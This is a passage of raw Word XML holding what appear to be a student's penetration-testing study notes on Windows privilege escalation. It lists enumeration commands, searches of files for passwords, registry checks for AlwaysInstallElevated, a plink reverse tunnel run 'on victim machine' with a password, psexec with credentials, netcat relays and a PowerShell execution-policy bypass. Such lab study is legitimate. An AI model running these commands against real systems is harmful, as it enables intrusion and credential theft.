        <w:t xml:space="preserve"> you can run this command on Windows Command Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C36E4A" w14:textId="20C307D6" w:rsidR="00472ECD" w:rsidRPr="00472ECD" w:rsidRDefault="00472ECD" w:rsidP="00472ECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00472ECD">
        <w:t>wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3257047D" w14:textId="4AD6174E" w:rsidR="00472ECD" w:rsidRDefault="009D06DC" w:rsidP="009D06DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="097B3B61" wp14:editId="76C05050">
            <wp:extent cx="3887799" cy="17337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1980" cy="17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EA20" w14:textId="5C99901C" w:rsidR="009D06DC" w:rsidRDefault="00087892" w:rsidP="009D06DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00670BA3" w:rsidRPr="004E3B6C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28FA6615" w14:textId="77777777" w:rsidR="00265FCF" w:rsidRPr="00472ECD" w:rsidRDefault="00265FCF" w:rsidP="00265FCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657D144D" w14:textId="5926C760" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="00691356">
      <w:bookmarkStart w:id="15" w:name="_cplg7bap2mws" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="06AFD065" w14:textId="77777777" w:rsidR="0084732D" w:rsidRDefault="0084732D" w:rsidP="0084732D">
      <w:r>
        <w:t>Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A90DE5" w14:textId="72B85F75" w:rsidR="0084732D" w:rsidRPr="009D140C" w:rsidRDefault="0084732D" w:rsidP="0084732D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0084732D"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>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"</w:t>
      </w:r>
      <w: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 xml:space="preserve"> (OS Version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2632EEDC" w14:textId="06E0B72F" w:rsidR="009D140C" w:rsidRPr="00841EB8" w:rsidRDefault="009D140C" w:rsidP="0084732D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pP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wmic os get osarchitecture (getting how many bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E04250" w14:textId="3ECD11F8" w:rsidR="00841EB8" w:rsidRPr="00841EB8" w:rsidRDefault="00841EB8" w:rsidP="00841EB8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urier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00841EB8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lang w:val="en-SG"/>
        </w:rPr>
        <w:t>C:\Windows\system32</w:t>
      </w:r>
      <w:r w:rsidRPr="00841EB8">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00841EB8">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="2B8156"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>wmic qfe get Caption,Description,HotFixID,InstalledOn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="2B8156"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> (See the installed patches for it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA441B8" w14:textId="5B578B2F" w:rsidR="00F953CE" w:rsidRDefault="00F953CE" w:rsidP="0084732D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numP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</w:pPr>
      <w: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>netsh -ano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4542C9" w14:textId="79C0A5C4" w:rsidR="001F2C75" w:rsidRPr="00BF35AD" w:rsidRDefault="001F2C75" w:rsidP="0084732D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numP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</w:pPr>
      <w:r w:rsidRPr="00BF35AD"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>netsh firewall show state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D327BCE" w14:textId="04D7B1FB" w:rsidR="001F2C75" w:rsidRDefault="001F2C75" w:rsidP="0084732D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numP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</w:pPr>
      <w:r w:rsidRPr="00BF35AD"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>netsh firewall show config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3A7401" w14:textId="77777777" w:rsidR="007E3C1A" w:rsidRDefault="007E3C1A" w:rsidP="007E3C1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numP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</w:pPr>
      <w:r w:rsidRPr="007E3C1A"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># We have a win here since any non-default directory in "C:\" will give write access to authenticated users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB7BAD3" w14:textId="0396E777" w:rsidR="007E3C1A" w:rsidRPr="007E3C1A" w:rsidRDefault="007E3C1A" w:rsidP="007E3C1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numP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</w:pPr>
      <w:r w:rsidRPr="007E3C1A"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>C:\Users\user1\Desktop&gt; echo %path%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1198B826" w14:textId="77777777" w:rsidR="00265FCF" w:rsidRDefault="00265FCF" w:rsidP="00265FCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systeminfo (shows the version and general things)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D3A813" w14:textId="6718532F" w:rsidR="007E3C1A" w:rsidRDefault="00265FCF" w:rsidP="00265FCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numP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</w:pPr>
      <w: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>Net users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C2697" w14:textId="4E22F6A8" w:rsidR="00265FCF" w:rsidRDefault="00265FCF" w:rsidP="00265FCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numP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</w:pPr>
      <w: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>Route print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D57E9" w14:textId="66A26900" w:rsidR="00265FCF" w:rsidRDefault="00D7215C" w:rsidP="00265FCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numP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</w:pPr>
      <w:r w:rsidRPr="00D7215C"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>findstr /si password *.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA311A4" w14:textId="3A7B810D" w:rsidR="00D7215C" w:rsidRDefault="00197F77" w:rsidP="00265FCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numP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</w:pPr>
      <w:r w:rsidRPr="00197F77"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>findstr /si password *.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3A9B58" w14:textId="77777777" w:rsidR="001348FC" w:rsidRPr="001348FC" w:rsidRDefault="001348FC" w:rsidP="001348FC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urier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001348FC">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="990066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t># This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B865BF4" w14:textId="77777777" w:rsidR="001348FC" w:rsidRPr="001348FC" w:rsidRDefault="001348FC" w:rsidP="001348FC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urier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001348FC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lang w:val="en-SG"/>
        </w:rPr>
        <w:t>C:\Windows\system32</w:t>
      </w:r>
      <w:r w:rsidRPr="001348FC">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001348FC">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="2B8156"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C89A06E" w14:textId="77777777" w:rsidR="001348FC" w:rsidRPr="001348FC" w:rsidRDefault="001348FC" w:rsidP="001348FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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urier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001348FC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lang w:val="en-SG"/>
        </w:rPr>
        <w:t>C:\Windows\system32</w:t>
      </w:r>
      <w:r w:rsidRPr="001348FC">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001348FC">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="2B8156"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1293E9" w14:textId="2EC82224" w:rsidR="00197F77" w:rsidRDefault="000B4353" w:rsidP="001348FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numP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</w:pPr>
      <w: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  <w:t>Sc qc spooler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7EC6D" w14:textId="77777777" w:rsidR="000B4353" w:rsidRPr="000B4353" w:rsidRDefault="000B4353" w:rsidP="000B4353">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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urier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B4353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lang w:val="en-SG"/>
        </w:rPr>
        <w:t>C:\</w:t>
      </w:r>
      <w:r w:rsidRPr="000B4353">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4353">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="2B8156"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>accesschk.exe -ucqv Spooler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E5B68F" w14:textId="77777777" w:rsidR="000B4353" w:rsidRPr="000B4353" w:rsidRDefault="000B4353" w:rsidP="000B4353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urier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B4353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lang w:val="en-SG"/>
        </w:rPr>
        <w:t>C:\</w:t>
      </w:r>
      <w:r w:rsidRPr="000B4353">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4353">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Courier New"/>
          <w:color w:val="2B8156"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>accesschk.exe -ucqv upnphost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED27C5E" w14:textId="77777777" w:rsidR="000B4353" w:rsidRPr="000B4353" w:rsidRDefault="000B4353" w:rsidP="000B4353">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="111111"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F27A418" w14:textId="0ECF2728" w:rsidR="00DC53DC" w:rsidRDefault="00DC53DC">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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01C956F5" w14:textId="1E53610B" w:rsidR="00873AE3" w:rsidRDefault="00873AE3" w:rsidP="00873AE3">
      <w:r>
        <w:t>Firewall check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBE950B" w14:textId="7866AF3F" w:rsidR="00873AE3" w:rsidRDefault="00873AE3" w:rsidP="00873AE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>netsh firewall show config (Show if firewall enable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509CF2F1" w14:textId="0172B0F7" w:rsidR="00873AE3" w:rsidRDefault="00873AE3" w:rsidP="00873AE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Solution is: port forwarding via ssh (for windows is plink)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FBB3F2" w14:textId="4959AE35" w:rsidR="00A15C20" w:rsidRDefault="00A15C20" w:rsidP="00873AE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use powershell to transfer (see OSCP pdf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E693D81" w14:textId="1DB3C04B" w:rsidR="00873AE3" w:rsidRDefault="00873AE3" w:rsidP="00873AE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">"systemctl start ssh.service" source: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00B20CB9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://lmgsecurity.com/enable-start-ssh-kali-linux/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00D93E06">
        <w:t xml:space="preserve">My own </w:t>
      </w:r>
      <w:r w:rsidR="00A07EEE">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00D93E06">
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710882AB" w14:textId="356B085A" w:rsidR="00E51C93" w:rsidRDefault="00AC4C7F" w:rsidP="00873AE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F23F1E">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00F23F1E" w:rsidRPr="00F23F1E">
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidR="00F23F1E" w:rsidRPr="00F23F1E">
        <w:t xml:space="preserve"> -l root -pw P4ssw0rd -R 445:127.0.0.1:445 10.11.0.55 -P 22</w:t>
      </w:r>
      <w:r w:rsidR="00F23F1E">
        <w:t xml:space="preserve"> (Run on Victim machine to connect back to my own Kali Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3072B150" w14:textId="28E2E65D" w:rsidR="00F23F1E" w:rsidRDefault="00B27C54" w:rsidP="005F1126">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B27C54">
        <w:t>python psexec.py alice:aliceishere@127.0.0.1 -path c:\\windows\\system32\\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  (run this to grant admin privilege to Bethany computer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AC3F93" w14:textId="161504B4" w:rsidR="00836C37" w:rsidRPr="005B5776" w:rsidRDefault="00836C37" w:rsidP="005F1126">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00560540">
        <w:t>ssh -L 6900:192.168.199.153:80 localhost (local port forwarding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F623446" w14:textId="523993AB" w:rsidR="005B5776" w:rsidRPr="00560540" w:rsidRDefault="005B5776" w:rsidP="005F1126">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00560540">
        <w:t>Remote port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B9D34" w14:textId="77777777" w:rsidR="005B5776" w:rsidRPr="00560540" w:rsidRDefault="005B5776" w:rsidP="00560540">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00560540">
        <w:t>To do that, edit </w:t>
      </w:r>
      <w:r w:rsidRPr="00560540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/etc/sshd_config</w:t>
      </w:r>
      <w:r w:rsidRPr="00560540">
        <w:t> with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E2DC8B" w14:textId="1283B754" w:rsidR="005B5776" w:rsidRPr="00560540" w:rsidRDefault="00526D89" w:rsidP="00560540">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00560540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GatewayPorts set to yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7213D081" w14:textId="77777777" w:rsidR="0085261F" w:rsidRPr="00560540" w:rsidRDefault="0085261F" w:rsidP="00560540">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00560540">
        <w:t>nc -l -p $localport -c "nc $remotehost $remoteport"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FB333A" w14:textId="142CA92D" w:rsidR="00965031" w:rsidRPr="00560540" w:rsidRDefault="00965031" w:rsidP="00560540">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00560540">
        <w:t xml:space="preserve">nc -l -p 4444 -c "nc example.com </w:t>
      </w:r>
      <w:r w:rsidR="00345EAD" w:rsidRPr="00560540">
        <w:t>4444</w:t>
      </w:r>
      <w:r w:rsidRPr="00560540">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA6352" w14:textId="77777777" w:rsidR="00560540" w:rsidRPr="00560540" w:rsidRDefault="00560540" w:rsidP="00560540">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00560540">
        <w:t>netcat -L 127.0.0.1:22 -p 8080 -vvv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1062E609" w14:textId="00F3F455" w:rsidR="00560540" w:rsidRDefault="00560540" w:rsidP="00560540">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00560540">
        <w:t>Listen on port 8080 of the server, and when somebody tries to connect, establish a link with 127.0.0.1:22 (i.e.: SSH server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F11794" w14:textId="77777777" w:rsidR="00560540" w:rsidRPr="00560540" w:rsidRDefault="00560540" w:rsidP="00560540"/>
    <w:p w14:paraId="621CD58C" w14:textId="77777777" w:rsidR="00526D89" w:rsidRDefault="00526D89" w:rsidP="00965031">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="149616F3" w14:textId="77777777" w:rsidR="00455842" w:rsidRDefault="00455842" w:rsidP="00455842"/>
    <w:p w14:paraId="29B1FDC9" w14:textId="77777777" w:rsidR="00455842" w:rsidRDefault="00455842" w:rsidP="00455842"/>
    <w:p w14:paraId="3C1DD55D" w14:textId="48242BAD" w:rsidR="00DC53DC" w:rsidRPr="00455842" w:rsidRDefault="00455842" w:rsidP="00455842">
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E15C99" w14:textId="7A840EE1" w:rsidR="00DC53DC" w:rsidRPr="00CD1B21" w:rsidRDefault="00455842" w:rsidP="00CD1B21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD1B21">
        <w:t>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 (Running a powershell script)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CBBBB1" w14:textId="53EC5F66" w:rsidR="00DC53DC" w:rsidRPr="00455842" w:rsidRDefault="00DC53DC">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat" w:cs="Montserrat"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E14ADB0" w14:textId="6A580669" w:rsidR="00DC53DC" w:rsidRDefault="00DC53DC">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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47082C0A" w14:textId="77777777" w:rsidR="00542B2B" w:rsidRDefault="00542B2B" w:rsidP="00F873FB"/>
    <w:p w14:paraId="30528D13" w14:textId="77777777" w:rsidR="00542B2B" w:rsidRDefault="00542B2B" w:rsidP="00F873FB"/>
    <w:p w14:paraId="50765031" w14:textId="77777777" w:rsidR="00F80AC0" w:rsidRDefault="00F80AC0">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat" w:cs="Montserrat"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A80B48E" w14:textId="5F015066" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc533025670"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PRIVILEGE ESCALATION: UNIX</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="069B5241" w14:textId="5B755DDB" w:rsidR="007351F7" w:rsidRPr="00342A2E" w:rsidRDefault="007351F7" w:rsidP="007351F7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Linuxprivchecker: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r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github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="409E8209" w14:textId="28D50CAE" w:rsidR="00342A2E" w:rsidRPr="00342A2E" w:rsidRDefault="00342A2E" w:rsidP="00342A2E">
      <w:pPr>
